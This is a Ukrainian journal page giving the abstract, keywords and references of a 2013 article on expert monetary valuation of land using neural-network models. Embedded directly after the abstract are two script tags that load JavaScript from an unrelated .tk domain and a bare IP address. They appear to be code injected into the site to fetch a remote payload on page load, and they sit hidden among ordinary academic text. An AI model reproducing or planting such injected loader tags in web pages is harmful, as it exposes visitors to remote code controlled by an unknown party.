ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 004.94:332.6
Економіка агропромислового виробництва

Експертна грошова оцінка земельних ресурсів із використанням нейромережевого моделювання / Ібатуллін Ш.І., Степенко О.В., Дорош О. С. // Економіка АПК. - 2013. - № 3 - С. 25

Розглянуто основні положення експертної грошової оцінки земельних ресурсів та виявлено необхідність застосування перспективних моделей і алгоритмів. Виявлено, що одним із перспективних напрямів розвитку оціночної діяльності в землересурсній сфері є використання сучасних економіко-математичних методів та моделей, що дають можливість підвищити ефективність системи оцінювання. Запропоновано напрями вдосконалення експертної грошової оцінки земельних ресурсів із використанням нейромережевих моделей. Отримано найбільш результативну модель з високим рівнем продуктивності та достовірності на основі радіально-базисної функції. Табл.: 1. Рис.: 10. Бібліогр.: 9.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: експертна грошова оцінка, земельні ресурси, фактор, нейромережеве моделювання, землі несільськогосподарського призначення, радіально-базисна функція

Список використаних джерел

  1. Гнаткович Д.І. Вдосконалення науково-методичних положень грошової оцінки землі / Д. І. Гнаткович, А. Я. Сохнич, В. В. Горлачук, А. М. Шворак. – Л. : ЦНТЕІ, 1998. – С. 21–23.
  2. Добряк Д.С. Економічний оборот землі в Україні: теорія, методологія і практика : [монографія] / Д. С. Добряк, А. Г. Тихонов, Л. В. Паламарчук. – К. : Урожай, 2004. – 136 с.
  3. Закон України "Про оцінку земель" : прийнятий 11 грудня 2003 № 1378-IV // Відом. Верхов. Ради України (ВВР). – 2004. – № 15. – Ст. 229.
  4. Мартин А.Г. Економічна оцінка земель сільськогосподарського призначення в сучасних умовах / А.Г. Мартин, А.І. Пантелеймонов, Ю.М. Вагін та ін. // Землеустрій і кадастр. – 2005. – № 3. – С. 15-22.
  5. Месель-Веселяк В.Я. Удосконалення грошової оцінки земель сільськогосподарського призначення / В. Я. Ме-сель-Веселяк, М. М. Федоров // Економіка АПК. – 2002. – № 8. – С. 10–16.
  6. Палеха Ю.М. Розвиток грошової оцінки земель в Україні на сучасному етапі / Ю.М. Палеха // Землеустрій та кадастр. – 2011. – №1. – С. 28 – 31.
  7. Постанова Кабінету Міністрів України "Про експертну грошову оцінку земельних ділянок" від 11.10.2002 № 1531: Електронний ресурс. – [Режим доступу]: http://zakon2.rada.gov.ua/laws/show/1531-2002-п.
  8. Третяк А.М. Концептуальні проблеми розвитку грошової оцінки земель в Україні [Текст] / А.М. Третяк; УААН, Інститут землеустрою. – К. : [б.в.], 2001. – 50 с.
  9. Хвесик М.А. Економічна оцінка природних ресурсів: основні методологічні підходи / М.А. Хвесик, Н.В. Збагерська. – Рівне: Вид-во РДТУ, 2000. – 194 с.
Читати статтю: 13_03_03.pdf